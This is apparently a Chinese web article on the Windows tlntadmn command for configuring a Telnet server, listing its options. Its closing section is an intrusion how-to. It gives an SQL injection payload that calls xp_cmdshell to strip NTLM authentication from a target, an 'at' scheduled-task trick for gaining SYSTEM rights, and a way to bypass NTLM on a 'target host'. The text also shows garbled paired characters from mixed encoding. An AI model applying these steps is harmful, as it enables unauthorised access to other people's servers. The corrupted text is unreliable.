導(dǎo)讀:telnet可以幫助我們完成遠(yuǎn)程的登錄設(shè)置,那么管理員如何對端口認(rèn)證等系統(tǒng)進(jìn)行管理呢?
這里我們就來介紹一下tlntadmn命令的用法。這個命令可以幫助我們完成telnet服務(wù)的這些設(shè)置。那么,tlntadmn是telnet服務(wù)的設(shè)置命令,可以對telnet服務(wù)的端口、認(rèn)證方式等進(jìn)行設(shè)置:
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有會話用 'all'.
1.-s sessionid 列出會話的信息.
2.-k sessionid 終止會話.
3.-m sessionid 發(fā)送消息到會話.
4.config 配置Telnet服務(wù)器參數(shù).
5.
6.common_options 為:
7.-u user 指定要使用其憑據(jù)的用戶
8.-p password 用戶密碼
9.config_options 為:
10.dom = domain 設(shè)定用戶的默認(rèn)域
11.ctrlakeymap = yes|no 設(shè)定 ALT 鍵的映射
12.timeout = hh:mm:ss 設(shè)定空閑會話超時值 timeoutactive = yes|no 啟用空閑會話.
13.maxfail = attempts 設(shè)定斷開前失敗的登錄企圖數(shù).
14.maxconn = connections 設(shè)定最大連接數(shù).
15.port = number 設(shè)定Telnet端口.
16.sec = [+/-]NTLM [+/-]passwd 設(shè)定身份驗證機(jī)構(gòu)
17.fname = file 指定審計文件名.
18.fsize = size 指定審計文件的最大尺寸(MB).
19.mode = console|stream 指定操作模式.
20.auditlocation = eventlog|file|both 指定記錄地點
21.audit = [+/-]user [+/-]fail [+/-]admin 指定審計的事件
使用的辦法:
直接運行命令:tlntadmn config sec = -ntlm
注射的話可以直接運行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--運行以后就去掉了ntlm認(rèn)證.
1.C:\>tlntadmn config sec = -ntlm -----------------使用admin權(quán)限
2.C:\>at 20:43 /interactive "cmd" -----------at命令啟用system權(quán)限
3.新加了一項作業(yè),其作業(yè) ID = 1
4.C:\WINNT\system32>tlntadmn config sec = -ntlm
去除NTML驗證的另一個方法:在目標(biāo)主機(jī)上建立好一個管理員用戶!在本機(jī)建立一個和目標(biāo)主機(jī)上相同的帳號密碼的用戶,在本機(jī)CMD上右擊選擇運行方式~ 輸入該帳號和密碼,直接Telnet服務(wù)的目標(biāo)IP, 既可直接饒過NTML驗證.
北京 | 天津 | 上海 | 江蘇 | 山東 |
安徽 | 浙江 | 江西 | 福建 | 深圳 |
廣東 | 河北 | 湖南 | 廣西 | 河南 |
海南 | 湖北 | 四川 | 重慶 | 云南 |
貴州 | 西藏 | 新疆 | 陜西 | 山西 |
寧夏 | 甘肅 | 青海 | 遼寧 | 吉林 |
黑龍江 | 內(nèi)蒙古 |